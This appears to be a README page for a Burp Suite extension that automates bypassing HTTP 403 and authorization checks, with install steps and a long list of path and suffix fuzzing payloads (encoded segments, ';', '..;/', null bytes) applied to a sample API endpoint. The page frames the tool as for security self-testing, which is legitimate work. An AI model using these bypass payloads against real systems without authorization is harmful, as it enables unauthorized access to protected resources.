Home

Awesome

AutoBypass403-BurpSuite

一个自动化bypass 403/auth的Burpsuite插件

申明:该工具只用于安全自测,禁止用于非法用途

ChangeLog

2022-07-16

2022-02-08

2022-06-28

2021-12-05

2021-12-04

2021-12-02

How to Run

  1. 下载 Bypass.jar

  2. Burpsuite Extender add Bypass.jar

    image-20211204120709887

  3. 选择目标请求, 右键点击 "send to bypass 403"

    image-20211202221317291

  4. 选择Bypass 403 table,查看结果

    image-20211205121741248

  5. fuzz规则如下:

/web/api/presaleConfig/list

路径FUZZ:

/%77%65%62/api/presaleConfig/list
/web;/api/presaleConfig/list
/images/..;/web/api/presaleConfig/list
/images;/../web/api/presaleConfig/list
/%2e/web/api/presaleConfig/list
/;/web/api/presaleConfig/list
/./web/api/presaleConfig/list
//web/api/presaleConfig/list
/web%20/api/presaleConfig/list
/web%09/api/presaleConfig/list
/.;/web/api/presaleConfig/list
/..%00/web/api/presaleConfig/list
/..%0d/web/api/presaleConfig/list
/..%5c/web/api/presaleConfig/list
/#/../web/api/presaleConfig/list

/web/%61%70%69/presaleConfig/list
/web/api;/presaleConfig/list
/web/images/..;/api/presaleConfig/list
/web/images;/../api/presaleConfig/list
/web/%2e/api/presaleConfig/list
/web/;/api/presaleConfig/list
/web/./api/presaleConfig/list
/web//api/presaleConfig/list
/web/./api/presaleConfig/list
/web/api%20/presaleConfig/list
/web/api%09/presaleConfig/list
/web/.;/api/presaleConfig/list
/web/..%00/api/presaleConfig/list
/web/..%0d/api/presaleConfig/list
/web/..%5c/api/presaleConfig/list
/web/#/../api/presaleConfig/list

后缀FUZZ:
/web/api/presaleConfig/list.js
/web/api/presaleConfig/list.css
/web/api/presaleConfig/list.json
/web/api/presaleConfig/list.html
/web/api/presaleConfig/list;.css
/web/api/presaleConfig/list;.js
/web/api/presaleConfig/list/.
/web/api/presaleConfig/list/
/web/api/presaleConfig/list/./
/web/api/presaleConfig/list%20
/web/api/presaleConfig/list%09
/web/api/presaleConfig/list?
/web/api/presaleConfig/list?error
/web/api/presaleConfig/list#
/web/api/presaleConfig/list/*
/web/api/presaleConfig/list%26

Thanks